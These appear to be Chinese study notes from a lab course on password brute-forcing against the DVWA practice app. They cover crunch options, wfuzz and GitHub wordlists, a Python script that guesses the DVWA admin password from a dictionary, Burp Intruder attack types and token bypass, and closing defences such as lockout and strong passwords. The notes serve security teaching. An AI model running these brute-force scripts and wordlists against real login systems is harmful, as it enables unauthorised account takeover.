目录
5. -f 调用库文件 /usr/share/crunch/charset.lst
6. -i 改变输出格式,即aaa,aab -> aaa,baa
12. -r 告诉crunch继续从它离开的地方恢复生产密码字典
13. -s 指定一个开始的字符,即从自己定义的密码xxxx开始
16. -z 压缩生成的字典文件,支持gzip,bzip2,lzma,7z
7.5.1 Cluster bomb 榴霰[xiàn]弹**
可以分为存储安全、传输安全和输入安全(登录界面),权限管理进行认证和授权。
- 从数据库获取密码,解密
- 窃听通信数据数据,解密
- 直接从登录框猜测密码
https://nordpass.com/most-common-passwords-list/裤子
1、密码长度2、密码内容 0-9 a-z A-Z !@#$%^&*
我们先进入wfuzz字典里面
wfuzz自带字典
- .
- ├── Injections
- │ ├── All_attack.txt
- │ ├── SQL.txt
- │ ├── Traversal.txt
- │ ├── XML.txt
- │ ├── XSS.txt
- │ └── bad_chars.txt
- ├── general
- │ ├── admin-panels.txt
- │ ├── big.txt
- │ ├── catala.txt
- │ ├── common.txt
- │ ├── euskera.txt
- │ ├── extensions_common.txt
- │ ├── http_methods.txt
- │ ├── medium.txt
- │ ├── megabeast.txt
- │ ├── mutations_common.txt
- │ ├── spanish.txt
- │ └── test.txt
- ├── others
- │ ├── common_pass.txt
- │ └── names.txt
- ├── stress
- │ ├── alphanum_case.txt
- │ ├── alphanum_case_extra.txt
- │ ├── char.txt
- │ ├── doble_uri_hex.txt
- │ ├── test_ext.txt
- │ └── uri_hex.txt
- ├── vulns
- │ ├── apache.txt
- │ ├── cgis.txt
- │ ├── coldfusion.txt
- │ ├── dirTraversal-nix.txt
- │ ├── dirTraversal-win.txt
- │ ├── dirTraversal.txt
- │ ├── domino.txt
- │ ├── fatwire.txt
- │ ├── fatwire_pagenames.txt
- │ ├── frontpage.txt
- │ ├── iis.txt
- │ ├── iplanet.txt
- │ ├── jrun.txt
- │ ├── netware.txt
- │ ├── oracle9i.txt
- │ ├── sharepoint.txt
- │ ├── sql_inj.txt
- │ ├── sunas.txt
- │ ├── tests.txt
- │ ├── tomcat.txt
- │ ├── vignette.txt
- │ ├── weblogic.txt
- │ └── websphere.txt
- └── webservices
- ├── ws-dirs.txt
- └── ws-files.txt
- https://github.com/xjrelc/Blasting_dictionary
- https://github.com/TgeaUs/Weak-password
- https://github.com/fuzz-security/SuperWordlist
- https://github.com/k8gege/PasswordDic
- https://github.com/TheKingOfDuck/fuzzDicts
- https://github.com/Ifonly-go2019/FuzzDict
- https://github.com/ppbibo/PentesterSpecialDict
- https://github.com/huyuanzhi2/password_brute_dictionary
- https://weakpass.com/download
其他的建议在github搜索:字典、dict、wordlist之类的关键词
注意使用场合:
比如Web网站密码字典、WiFi密码字典、操作系统用户密码字典、数据库密码字典……
比如生日、手机号、QQ号
crunch -h
cupp、ccupp
cewl https://sqlmap.org -w dict.txt
crunch -h
Usage
crunch[ ] [options]
1.Lalpha
abcdefghijklmnopqrstuvwxyz
2.Ualpha
ABCDEFGHIJKLMNOPQRSTUVWXYZ3. Numeric
01234567894.Speical
!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/
- 字符串 或者-p 单词1 单词2 ...以排列组合的方式
- 来生成字典
- 生成不重复的字符串
- 必须放在最后
- 不能和-s一起使用
- 会忽略最小长度和最大长度
思路
- 从字典读取值,生成密码
pwds = open("password.txt") for pwd in pwds: print(pwd) pwds.close()
- HTTP连接到需要暴破的地址(URL F12看网络连接即可获得)
import requests # 如果第一个密码就提示成功,是 PHPSESSID 没有替换的问题 pwds = open("password.txt") for pwd in pwds: url = "http://localhost/dvwa/vulnerabilities/brute/" # PHPSESSID务必替换为登录以后的PHPSESSID resp = requests.get(url = url, params = {"username":"admin", "password":pwd.strip(), "Login":"Login"}, headers = {"Cookie":"security=low; PHPSESSID=himu84h1ia6vsvklt76c9juhqd"}) #print(resp.text) if 'Username and/or password incorrect.' in resp.text: print('破解失败:'+pwd, end='') else: print('破解成功:'+pwd, end='') break; pwds.close()
- 获得HTTP响应,分析响应结果,看看有没有错误提示
- “Username and/or password incorrect.”
- 如果有提示,就继续下一次循环
- 如果没有,就代表暴破成功
我们的目的是利用BP里面的字典来暴力破解password的值,进入intruder模块
在positions里面有Attack type模块,4个参数类型
我们以Sniper为例,先clear后添加需要爆破的字段
Payload set只有一个,但是Payload type类型有很多,以Simple list为例
Add 可以添加自己想加入的字段,Add from list 是BP自带的字典
这里先不改,用默认即可,如果有二次竞争则需要修改,现在可以发起攻击了,
FLAG将length进行降序排序即可、
它的admin和password保存一致
可以分别设置二个list,进行验证。
可以分别设置二个list,交叉尝试,n x m 型
sleep()响应时间延长了,
添加了token校验,使得请求必须串型
添加token
第二个token字段,添加递归字段
Option add 规则,先请求一次,后选中接收到的token值,复制
再回到payload选项,选中,在Initial payload for first request:粘贴
再创造一个单线程,Token
get flag
or
懂的都懂
- sleep
- Token
- 限制尝试次数,锁定账户
- 使用复杂密码
- 不同网站使用不同密码
- 定期修改密码
- 防止被钓鱼